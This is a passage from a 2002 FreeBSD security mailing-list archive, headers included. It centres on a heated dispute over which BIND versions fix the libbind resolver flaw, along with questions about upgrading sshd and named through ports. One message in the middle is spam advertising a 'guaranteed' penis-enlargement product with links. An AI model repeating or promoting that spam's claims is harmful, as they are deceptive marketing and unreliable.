Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:27 PM 6/29/2002, Doug Barton wrote: > > > The libbind bug is fixed in both 8.2.6, and 8.3.3. Please be more > >careful to read what is posted before responding. > > I know that there were earlier fixes to prevent buffer overrruns. > My impression, based on ISC's statements, is that more were required > after that time. Have you done a diff between 8.2.6 and 8.3.3? Non sequitur. I was responding to your claim that libbind was fixed only in 8.3.3. You are categorically wrong on that point. I already said that if you're running BIND 8, you're better off with the 8.3.3 version. > >That said, if you are > >going to run a BIND 8 server, I think you're a lot better off with > >8.3.3. > > I want to run a BIND 9 server, because it will protect vulnerable > machines and apps behind it. But it looks as if I'll need to get > libbind out of 8.3.3, too Only if you're using something that links against it. IMO you're better off just not having it around. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:48:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7CDF837B405 for ; Sat, 29 Jun 2002 14:48:20 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id B2C5E43E1A for ; Sat, 29 Jun 2002 14:48:19 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA13986; Sat, 29 Jun 2002 15:48:08 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629154457.02fafb00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 15:47:56 -0600 To: Pete Ehlke , security@FreeBSD.ORG From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-Reply-To: <20020629214312.GA20882@rfc822.net> References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:43 PM 6/29/2002, Pete Ehlke wrote: >Please, Brett. Don't embarass yourself further on this. > >http://marc.theaimsgroup.com/?l=bind-announce&m=102527571007047&w=2 >http://marc.theaimsgroup.com/?l=bind-announce&m=102527570707030&w=2 Embarrass? The page you cite actually proves that I'm correct! It says: >Highlights vs. 8.3.2 > Security Fix libbind. All applications linked against libbind > need to re-linked. What this means is that the only safe version of libbind is 8.3.3. BIND 9.2.1 includes an older version of libbind, and so while its named is not vulnerable (and in fact can be used to shield other machines), its libbind is. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:52:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AEC1837B400; Sat, 29 Jun 2002 14:52:32 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E7C643E09; Sat, 29 Jun 2002 14:52:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA14030; Sat, 29 Jun 2002 15:52:25 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629154840.02cef6a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 15:52:12 -0600 To: Doug Barton From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Mark.Andrews@isc.org, security@FreeBSD.ORG In-Reply-To: <3D1E2A5A.522E53C7@FreeBSD.org> References: <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:44 PM 6/29/2002, Doug Barton wrote: > Non sequitur. I was responding to your claim that libbind was fixed >only in 8.3.3. You are categorically wrong on that point. Not unless ISC is lying, which of course it would have no reason to do. See http://marc.theaimsgroup.com/?l=bind-announce&m=102527570707030&w=2 which says that libbind was fixed between 8.3.2 and 8.3.3. > Only if you're using something that links against it. IMO you're better >off just not having [libbind] around. Some things link with it. I believe that Sendmail is among them. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:57: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F33C337B401 for ; Sat, 29 Jun 2002 14:57:02 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id A54FD43E06 for ; Sat, 29 Jun 2002 14:57:02 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 6E5A08B5C7; Sat, 29 Jun 2002 14:57:00 -0700 (PDT) Message-ID: <3D1E2D22.EBCE8199@FreeBSD.org> Date: Sat, 29 Jun 2002 14:56:50 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Pete Ehlke , security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:43 PM 6/29/2002, Pete Ehlke wrote: > > >Please, Brett. Don't embarass yourself further on this. > > > >http://marc.theaimsgroup.com/?l=bind-announce&m=102527571007047&w=2 > > Embarrass? The page you cite actually proves that I'm correct! You quoted the second page. The URL I left in the quotation above is the announcement for 8.2.6, which says: Highlights vs. 8.2.5 Security Fix libbind. All applications linked against libbind need to relinked. Also, take a look at the URL I posted previously: ftp://ftp.isc.org/isc/bind/src/8.2.6/825-826.diff > What this means is that the only safe version of libbind is 8.3.3. Wrong again. As I said before, if you can't be careful to read and understand what is being said before you post, please don't post. You're providing needless confusion to the people reading this list. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:58:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B729E37B400 for ; Sat, 29 Jun 2002 14:58:34 -0700 (PDT) Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by mx1.FreeBSD.org (Postfix) with ESMTP id 26CB843E13 for ; Sat, 29 Jun 2002 14:58:34 -0700 (PDT) (envelope-from pde@bastet.rfc822.net) Received: by bastet.rfc822.net (Postfix, from userid 1001) id 7A08E9FD21; Sat, 29 Jun 2002 16:58:37 -0500 (CDT) Date: Sat, 29 Jun 2002 16:58:37 -0500 From: Pete Ehlke To: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Message-ID: <20020629215837.GA21060@rfc822.net> References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020629154457.02fafb00@localhost> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 03:47:56PM -0600, Brett Glass wrote: > At 03:43 PM 6/29/2002, Pete Ehlke wrote: > > >Please, Brett. Don't embarass yourself further on this. > > > >http://marc.theaimsgroup.com/?l=bind-announce&m=102527571007047&w=2 > >http://marc.theaimsgroup.com/?l=bind-announce&m=102527570707030&w=2 > > Embarrass? The page you cite actually proves that I'm correct! It > says: > > >Highlights vs. 8.3.2 > > Security Fix libbind. All applications linked against libbind > > need to re-linked. > > What this means is that the only safe version of libbind is 8.3.3. For gods sake, man. Read both of them. You are patently, provably, empirically *wrong*. 8.2.6, 8.3.3, and, though heaven only knows why anyone would still want it, 4.9.9 were all fixed against this particular problem. > BIND 9.2.1 includes an older version of libbind, and so while its > named is not vulnerable (and in fact can be used to shield other > machines), its libbind is. > This is true. But why are you tempesting in this teapot? What exactly do you have that's linked against libbind? And don't say "I don't know." Building libbind and linking against it is something that takes direct, willful action on your part. furrfu. -P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 15:36:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B6A1D37B400; Sat, 29 Jun 2002 15:36:06 -0700 (PDT) Received: from sage-one.net (adsl-65-71-135-137.dsl.crchtx.swbell.net [65.71.135.137]) by mx1.FreeBSD.org (Postfix) with ESMTP id BEC6E43E0A; Sat, 29 Jun 2002 15:36:05 -0700 (PDT) (envelope-from jackstone@sage-one.net) Received: from sagea (sagea [192.168.0.3]) by sage-one.net (8.11.6/8.11.6) with SMTP id g5TMZp594549; Sat, 29 Jun 2002 17:35:51 -0500 (CDT) (envelope-from jackstone@sage-one.net) Message-Id: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> X-Sender: jackstone@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 29 Jun 2002 17:35:50 -0500 To: FreeBSD user , Scott Gerhardt From: "Jack L. Stone" Subject: Re: Sshd fix Cc: FreeBSD , In-Reply-To: <20020628190711.M7121-100000@Amber.XtremeDev.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE install distclean > I just ran this on a test box and the sshd version shows no change... I saw it compile and install, but #sshd -V gives old version #... What did I do wrong here...?? Best regards, Jack L. Stone, Administrator SageOne Net http://www.sage-one.net jackstone@sage-one.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 15:38:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE89F37B400 for ; Sat, 29 Jun 2002 15:38:35 -0700 (PDT) Received: from star.sstec.com (adsl-216-102-148-67.dsl.lsan03.pacbell.net [216.102.148.67]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3ABF643E06 for ; Sat, 29 Jun 2002 15:38:35 -0700 (PDT) (envelope-from fbsd1@sstec.com) Received: from comm.sstec.com (comm.sstec.com [192.168.74.10]) by star.sstec.com (8.12.3/8.12.3) with ESMTP id g5TMcOiO012013 for ; Sat, 29 Jun 2002 15:38:34 -0700 (PDT) (envelope-from fbsd1@sstec.com) Message-Id: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sat, 29 Jun 2002 14:38:29 -0700 To: security@FreeBSD.ORG From: John Long Subject: named 8.3.2-T1B vulnerable? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Running tag=RELENG_4_6 FreeBSD 4.6-RELEASE-p1 #2: Thu Jun 27 23:35:36 PDT 2002 4 boxes, 8 rebuilds, libc now this libbind thing. My named 8.3.2-T1B Thu Jun 27 22:17:53 PDT 2002 appears to be vulnerable. I just cvsuped and no changes other than ports. Any ideas on when/if the new bind will be getting to 4_6 ? I am trying to get way out of any town by July 3rd :-) I hope that this is the last for a few weeks too. John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 15:56:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 438A837B405; Sat, 29 Jun 2002 15:56:38 -0700 (PDT) Received: from sage-one.net (adsl-65-71-135-137.dsl.crchtx.swbell.net [65.71.135.137]) by mx1.FreeBSD.org (Postfix) with ESMTP id E33B543E06; Sat, 29 Jun 2002 15:56:36 -0700 (PDT) (envelope-from jackstone@sage-one.net) Received: from sagea (sagea [192.168.0.3]) by sage-one.net (8.11.6/8.11.6) with SMTP id g5TMuV594755; Sat, 29 Jun 2002 17:56:31 -0500 (CDT) (envelope-from jackstone@sage-one.net) Message-Id: <3.0.5.32.20020629175630.0117cc50@mail.sage-one.net> X-Sender: jackstone@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 29 Jun 2002 17:56:30 -0500 To: FreeBSD user , Scott Gerhardt From: "Jack L. Stone" Subject: Re: Sshd fix Cc: FreeBSD , In-Reply-To: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> References: <20020628190711.M7121-100000@Amber.XtremeDev.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:35 PM 6.29.2002 -0500, Jack L. Stone wrote: >At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: >>cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE >install distclean >> >I just ran this on a test box and the sshd version shows no change... I saw >it compile and install, but #sshd -V gives old version #... > >What did I do wrong here...?? > Never mind.... I know why.... sorry for the post. Best regards, Jack L. Stone, Administrator SageOne Net http://www.sage-one.net jackstone@sage-one.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 16:10:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE8AB37B400; Sat, 29 Jun 2002 16:09:57 -0700 (PDT) Received: from public.ls.xz.cn (public.ls.xz.cn [202.98.224.136]) by mx1.FreeBSD.org (Postfix) with SMTP id DD16143E13; Sat, 29 Jun 2002 16:09:44 -0700 (PDT) (envelope-from jacskr44@mail.ru) Received: from 216.77.61.89([213.219.67.70]) by public.ls.xz.cn(AIMC 2.9.5.2) with SMTP id jm1b3d1e96db; Sun, 30 Jun 2002 07:09:20 +0800 To: From: "kirbie" Subject: How to enlarge your penis 1-4"...guaranteed Date: Sat, 29 Jun 2002 19:10:24 -1600 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Message-Id: <20020629230944.DD16143E13@mx1.FreeBSD.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Our sales aren't the only thing GROWING with this product! Increase penis size 1-4"...guaranteed!! For complete information on how to gain back your self esteem: http://www.freehostchina.com/site2/69chevelle/index.html +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AS Seen On TV!! *Want to attract that special woman? *Interested in a little extra edge in business affairs? *Ever wonder why some people seem to have it all? If you answered yes to any of the above questions, and would like to gain that unfair advantage to attract that special woman or women: http://www.freehostchina.com/Minshan/shezwan/index.html +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ To "optOut": mailto:nogirls4me@iafrica.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17: 9:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 053C037B400; Sat, 29 Jun 2002 17:09:48 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F36DF43E0A; Sat, 29 Jun 2002 17:09:46 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA15112; Sat, 29 Jun 2002 18:09:32 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629180311.02b5b2d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 18:06:58 -0600 To: Doug Barton From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Pete Ehlke , security@FreeBSD.ORG In-Reply-To: <3D1E2D22.EBCE8199@FreeBSD.org> References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:56 PM 6/29/2002, Doug Barton wrote: >You quoted the second page. The URL I left in the quotation above is the >announcement for 8.2.6, which says: > >Highlights vs. 8.2.5 > Security Fix libbind. All applications linked against libbind > need to relinked. So? That's not the version of libbind that's in 9.2.1. The version in 9.2.1 is vulnerable; I've checked the source. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17:18:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0302537B400 for ; Sat, 29 Jun 2002 17:18:32 -0700 (PDT) Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by mx1.FreeBSD.org (Postfix) with ESMTP id 67EF543E2F for ; Sat, 29 Jun 2002 17:16:49 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5U0FhBu094804; Sat, 29 Jun 2002 17:15:44 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5U0Fh8s005523; Sat, 29 Jun 2002 17:15:43 -0700 (PDT) Date: Sat, 29 Jun 2002 17:15:42 -0700 (PDT) From: Doug Barton To: John Long Cc: security@FreeBSD.org Subject: Re: named 8.3.2-T1B vulnerable? In-Reply-To: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> Message-ID: <20020629170827.K5428-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 29 Jun 2002, John Long wrote: > Running tag=RELENG_4_6 > FreeBSD 4.6-RELEASE-p1 #2: Thu Jun 27 23:35:36 PDT 2002 > 4 boxes, 8 rebuilds, libc now this libbind thing. > > My named 8.3.2-T1B Thu Jun 27 22:17:53 PDT 2002 appears to be vulnerable. Note, there are three seperate problems here. First, there is a libc resolver vulnerability. This is fixed in the base by the security team already. If your machines have a fixed libc, or if they are behind a BIND 9.2.1 resolver, they are safe; as long as they don't make any resolver calls that don't go through the actual 9.2.1 resolver. Next, libbind has the same resolver bug as our libc did. BUT, if you don't link against libbind (and you'd know if you did) then you don't need to worry about it. Finally, if you are actually running named on any of these machines, you should be using 8.3.3 if you're using BIND 8. You can build the bind8 port with: make clean ; make -DPORT_REPLACES_BASE_BIND8 install and it will update the version of BIND on your system. You could also leave off the flag if you'd rather have the new bind in /usr/local, but 8.3.2-T1B had some icky bugs so I recommend just writing over it to be safe. > Any ideas on when/if the new bind will be getting to 4_6 ? I will be importing it into -current this weekend, if -current isn't too terribly broken. I'll give that a week or so to shake out before importing to RELENG_4. I doubt that the security officer team will want to import BIND 8.3.3 into any of the RELENG_4_x branches. The port will do the same work now, and will require less finagling. Hope this helps, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17:19:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8984537B405 for ; Sat, 29 Jun 2002 17:19:16 -0700 (PDT) Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2E68643E42 for ; Sat, 29 Jun 2002 17:18:24 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5U0IDBu094813; Sat, 29 Jun 2002 17:18:13 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5U0I8hH005526; Sat, 29 Jun 2002 17:18:13 -0700 (PDT) Date: Sat, 29 Jun 2002 17:18:08 -0700 (PDT) From: Doug Barton To: Brett Glass Cc: Pete Ehlke , Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-Reply-To: <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Message-ID: <20020629171611.S5428-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 29 Jun 2002, Brett Glass wrote: > At 03:56 PM 6/29/2002, Doug Barton wrote: > > >You quoted the second page. The URL I left in the quotation above is the > >announcement for 8.2.6, which says: > > > >Highlights vs. 8.2.5 > > Security Fix libbind. All applications linked against libbind > > need to relinked. > > So? That's not the version of libbind that's in 9.2.1. The version > in 9.2.1 is vulnerable; I've checked the source. Once again, no one is arguing against that point. Yes, the version of libbind in 9.2.1 is vulnerable. What you have said repeatedly, and what is demonstrably false, is that the only place libbind is fixed is in 8.3.3. It is also fixed in 8.2.6. Now please let this drop.... you're not adding anything useful to the topic. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17:25:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9F2B337B401; Sat, 29 Jun 2002 17:25:16 -0700 (PDT) Received: from sage-one.net (adsl-65-71-135-137.dsl.crchtx.swbell.net [65.71.135.137]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1CF5A43E06; Sat, 29 Jun 2002 17:25:15 -0700 (PDT) (envelope-from jackstone@sage-one.net) Received: from sagea (sagea [192.168.0.3]) by sage-one.net (8.11.6/8.11.6) with SMTP id g5U0P9595864; Sat, 29 Jun 2002 19:25:09 -0500 (CDT) (envelope-from jackstone@sage-one.net) Message-Id: <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net> X-Sender: jackstone@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 29 Jun 2002 19:25:08 -0500 To: Scott Robbins From: "Jack L. Stone" Subject: Re: Sshd fix Cc: FreeBSD user , Scott Gerhardt , FreeBSD , freebsd-security@FreeBSD.ORG In-Reply-To: <20020630004754.GA2600@scott1.homeunix.net> References: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote: >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. Stone wrote: >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE >> install distclean >> > >> I just ran this on a test box and the sshd version shows no change... I saw >> it compile and install, but #sshd -V gives old version #... >> >> What did I do wrong here...?? > >BTW after the other Scott's post, I tried it his way--leaving out >sshd_enable and sshd_program. Worked quite well--also, one reason I >haven't done the overwrite option--as Jonathan said, won't that get >clobbered next time you do make world? > >Interestingly enough, pkg-message suggests doing this--leaving >sshd_enable at YES, adding sshd_program and then editing the path, (I >assume root's) so that /usr/local/sbin comes before /usr/sbin. >However, I've found the lazy man's way, which seems to be efficient as >well, to be a combination of Jonathan's and the other Scott's. > >I realize this is not exactly what Jack is asking, but I'm wondering >too--if one does the OVERWRITE, won't it get clobbered upon the next >make world? > >Thanks >Scott Robbins >> This is what worries me too. I deinstalled the ssh port right afterwards, but I'm wondering what else is changed. I noticed it updated the openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that "d" version installed. I'm running SSL on that machine and it still says 0.9.6.a when I load Apache_modssl and OpenSSH, etc. But, NOW, I'm really worried that I shot myself in the foot and this is waiting to bite me later. If anyone knows the answer to what Scott said about the next make world clobbering things, please let me know.... Best regards, Jack L. Stone, Administrator SageOne Net http://www.sage-one.net jackstone@sage-one.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17:29:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3B61037B400; Sat, 29 Jun 2002 17:29:52 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 033C643E06; Sat, 29 Jun 2002 17:29:51 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5U0Tmm0062703; Sun, 30 Jun 2002 10:29:48 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206300029.g5U0Tmm0062703@drugs.dv.isc.org> To: Brett Glass Cc: Doug Barton , Pete Ehlke , security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-reply-to: Your message of "Sat, 29 Jun 2002 18:06:58 CST." <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Date: Sun, 30 Jun 2002 10:29:48 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: 